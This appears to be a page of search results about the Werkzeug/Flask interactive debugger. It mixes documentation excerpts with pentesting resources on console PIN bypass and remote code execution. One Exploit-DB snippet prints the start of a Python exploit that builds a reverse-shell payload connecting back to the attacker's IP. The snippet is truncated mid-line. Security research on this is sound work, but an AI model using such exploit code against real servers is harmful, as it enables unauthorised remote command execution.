🌐
Werkzeug
werkzeug.palletsprojects.com › en › stable › debug
Debugging Applications — Werkzeug Documentation (3.1.x)
Enables debugging support for a given application: from werkzeug.debug import DebuggedApplication from myapp import app app = DebuggedApplication(app, evalex=True)
🌐
Spapas
spapas.github.io › 2016 › 06 › 07 › django-werkzeug-debugger
Using Werkzeug debugger with Django - /var/ - GitHub Pages
django-extensions: a swiss army knife toolset for django - beyond other useful tools it includes a management command (runserver_plus) to start the Werkzeug interactive debugger with your project
🌐
Beautiful Soup
tedboy.github.io › flask › _modules › werkzeug › debug.html
Source code for werkzeug.debug - Flask API
[docs] def __init__(self, app, evalex=False, request_key='werkzeug.request', console_path='/console', console_init_func=None, show_hidden_frames=False, lodgeit_url=None, pin_security=True, pin_logging=True): if lodgeit_url is not None: from warnings import warn warn(DeprecationWarning('Werkzeug now pastes into gists.')) if not console_init_func: console_init_func = None self.app = app self.evalex = evalex self.frames = {} self.tracebacks = {} self.request_key = request_key self.console_path = console_path self.console_init_func = console_init_func self.show_hidden_frames = show_hidden_frames self.secret = gen_salt(20) self._failed_pin_auth = 0 self.pin_logging = pin_logging if pin_security: # Print out the pin for the debugger on standard out.
🌐
Netscylla
netscylla.com › blog › 2018 › 10 › 03 › werkzeug-debugger.html
Werkzeug Debugger | Netscylla’s Blog
October 3, 2018 - Also worth noting is that the debugger only accepts commands sent in by the GET-parameter, which will then show up in access logs on the vulnerable host, which is great for forensic analysis and investigation.
🌐
GitHub
github.com › wdahlenburg › werkzeug-debug-console-bypass
GitHub - wdahlenburg/werkzeug-debug-console-bypass: Werkzeug has a debug console that requires a pin. It's possible to bypass this with an LFI vulnerability or use it as a local privilege escalation vector. · GitHub
* Running on http://172.17.0.4:7777/ (Press CTRL+C to quit) * Restarting with stat User: werkzeug-user Module: flask.app Module Name: Flask App Location: /usr/local/lib/python3.9/site-packages/flask/app.py Mac Address: 2485377892356 Werkzeug Machine ID: b'ea1fc30b6f4a173cea015d229c6b55b69d0ff00819670374d7a02397bc236523a57e9bab0c6e6167470ac65b66075388' * Debugger is active!
Starred by 64 users
Forked by 7 users
Languages   Python 85.8% | Dockerfile 14.2%
🌐
GitHub
github.com › pallets › werkzeug › blob › main › src › werkzeug › debug › __init__.py
werkzeug/src/werkzeug/debug/__init__.py at main · pallets/werkzeug
"""Enables debugging support for a given application:: · from werkzeug.debug import DebuggedApplication · from myapp import app · app = DebuggedApplication(app, evalex=True) · The ``evalex`` argument allows ...
Author   pallets
🌐
Pocoo
mitsuhiko.pocoo.org › werkzeug-docs › debug.html
Debugging Applications - Werkzeug
Enables debugging support for a given application: from werkzeug.debug import DebuggedApplication from myapp import app app = DebuggedApplication(app, evalex=True)
🌐
Exploit-DB
exploit-db.com › exploits › 43905
Werkzeug - 'Debug Shell' Command Execution - Multiple remote Exploit
January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%
🌐
Medium
medium.com › swlh › hacking-flask-applications-939eae4bffed
Hacking Flask Applications. Executing arbitrary commands using the… | by Vickie Li | The Startup | Medium
February 18, 2020 - In particular, Werkzeug includes an interactive debugger that allows inspecting stack traces and source code in the browser.
🌐
Readthedocs
werkzeug-docs-cn.readthedocs.io › zh-cn › latest › debug.html
Debugging Applications — Werkzeug 0.9.4 documentation
Enables debugging support for a given application: from werkzeug.debug import DebuggedApplication from myapp import app app = DebuggedApplication(app, evalex=True)
🌐
GitHub
github.com › pallets › werkzeug › blob › main › src › werkzeug › debug › tbtools.py
werkzeug/src/werkzeug/debug/tbtools.py at main · pallets/werkzeug
<title>%(title)s // Werkzeug Debugger</title> <link rel="stylesheet" href="?__debugger__=yes&amp;cmd=resource&amp;f=style.css"> <link rel="shortcut icon" href="?__debugger__=yes&amp;cmd=resource&amp;f=console.png"> <script src="?__debugger__=yes&amp;cmd=resource&amp;f=debugger.js"></script> <script> var CONSOLE_MODE = %(console)s, EVALEX = %(evalex)s, EVALEX_TRUSTED = %(evalex_trusted)s, SECRET = "%(secret)s"; </script> </head> <body style="background-color: #fff"> <div class="debugger"> """ ·
Author   pallets
🌐
HackTricks
book.hacktricks.xyz › home › network services pentesting › pentesting web › werkzeug
Werkzeug / Flask Debug - HackTricks
This script produces the PIN by hashing the concatenated bits, adding specific salts (cookiesalt and pinsalt), and formatting the output. It’s important to note that the actual values for probably_public_bits and private_bits need to be accurately obtained from the target system to ensure the generated PIN matches the one expected by the Werkzeug console.
🌐
GitHub
github.com › its-arun › Werkzeug-Debug-RCE
GitHub - its-arun/Werkzeug-Debug-RCE: Python script for exploiting Werkzeug Debug RCE useful for CTF · GitHub
Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.
Starred by 39 users
Forked by 22 users
Languages   Python
🌐
Bottlepy
bottlepy.org › docs › 0.12 › plugins › werkzeug.html
Bottle-Werkzeug — Bottle 0.12.25 documentation
@app.route('/hello/:name') def say_hello(name): greet = {'en':'Hello', 'de':'Hallo', 'fr':'Bonjour'} language = req.accept_languages.best_match(greet.keys()) if language: return werkzeug.Response('%s %s!' % (greet[language], name)) else: raise werkzeug.exceptions.NotAcceptable() This plugin replaces the default error page with an advanced debugger.
🌐
Pocoo
mitsuhiko.pocoo.org › werkzeug-docs › script.html
Management Script Utilities - Werkzeug
Because a runserver and shell command is pretty common there are two factory functions that create such commands: def make_app(): from yourapplication import YourApplication return YourApplication(...) action_runserver = script.make_runserver(make_app, use_reloader=True) action_shell = script.make_shell(lambda: {'app': make_app()}) The script from above can be used like this from the shell now: $ ./manage.py --help $ ./manage.py runserver localhost 8080 --debugger --no-reloader $ ./manage.py runserver -p 4000 $ ./manage.py shell
🌐
Plotly
community.plotly.com › dash python
How to trigger werkzeug debugger - Dash Python - Plotly Community Forum
April 8, 2019 - I’m trying to intentionally enter the Werkzeug interactive debugger using the snippet below, and placing debug() at desired breakpoints, but the browser never enters the debugger. All I get is an AssertionError in the command prompt. if os.environ.get('FLASK_ENV') == 'development': DEBUG = True else: DEBUG = False def debug(): assert DEBUG == False I’m trying to use this as an alternative to when ipdb doesn’t behave well, and until the highly anticipated dash-dev-tools comes out!
🌐
InfosecMatter
infosecmatter.com › home › metasploit module library
Werkzeug Debug Shell Command Execution - Metasploit - InfosecMatter
December 4, 2022 - A sample application which enables the console debugger is available here ... Do: check [+] 10.108.106.201:8081 - The target is vulnerable. ... You should get a shell. ... TARGETURI by default is /console, as defined by werkzeug, however it can be changed within the python script.
🌐
Gitbook
angelica.gitbook.io › hacktricks › network-services-pentesting › pentesting-web › werkzeug
Werkzeug / Flask Debug - HackTricks - GitBook
November 10, 2024 - This script produces the PIN by hashing the concatenated bits, adding specific salts (cookiesalt and pinsalt), and formatting the output. It's important to note that the actual values for probably_public_bits and private_bits need to be accurately obtained from the target system to ensure the generated PIN matches the one expected by the Werkzeug console.
🌐
HackTricks
hacktricks.boitatech.com.br › pentesting › pentesting-web › werkzeug
werkzeug | HackTricks - Boitatech
September 30, 2021 - Locate vulnerable Werkzeug debug console at path vulnerable-site.com/console, but is locked by secret PIN number.
🌐
Exploit-DB
exploit-db.com › exploits › 37814
Werkzeug - Debug Shell Command Execution (Metasploit) - Python remote Exploit
August 18, 2015 - ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Werkzeug Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips passed testing.